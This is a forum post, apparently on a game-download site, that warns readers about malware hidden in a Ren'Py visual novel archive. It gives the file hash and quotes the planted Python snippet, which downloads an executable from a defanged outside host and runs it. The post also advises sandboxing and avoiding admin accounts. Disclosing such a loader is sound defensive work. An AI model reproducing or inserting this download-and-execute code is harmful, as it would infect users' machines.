1/3
3 Years of Service
As a reminder, people should never run those VNs as usual programs, always threat them with precautions. Run them in virtual machines or inthere is malware in at least the files linked from gofile, PillKing-0.21-pc.zip with md5 c47b9707e94d7d5cde67654854920915. it contains python to download and execute malware (i've edited parts of the url):
Python:# Download and execute the file file_url = 'hxxp://gostatts[.]com/game[.]exe' local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file') print(f"Attempting to download file from {file_url} to {local_file_path}") if download_file(file_url, local_file_path): print(f"Attempting to execute file at {local_file_path}") run_file(local_file_path) else: print("Download failed. File will not be executed.")
virustotal also doesn't have great things to say about this:You must be registered to see links
if you downloaded and executed this, i'd start doing some damage control.
edit: mods updated links in OP already so i assume they're clean now.
You must be registered to see links
(it's open source and free). Also, NEVER NEVER run them with an administrator user.